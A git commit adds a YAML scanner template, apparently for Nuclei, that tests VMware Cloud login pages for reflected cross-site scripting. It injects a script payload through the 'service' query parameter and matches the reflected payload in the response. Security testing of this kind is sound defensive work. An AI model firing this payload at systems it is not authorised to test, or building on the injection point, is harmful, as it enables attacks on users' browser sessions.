Create vmware-cloud-reflected-xss.yaml
parent
1815650540
commit
7d98d173ad
|
@ -0,0 +1,33 @@
|
|||
id: vmware-cloud-reflected-xss
|
||||
|
||||
info:
|
||||
name: VMWare Cloud - Cross Site Scripting
|
||||
author: tess
|
||||
severity: medium
|
||||
metadata:
|
||||
verified: true
|
||||
tags: vmware,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login/?redirectTo=/tenant/e&service=</script><script>alert(document.domain)</script>'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
- 'let tokens ='
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue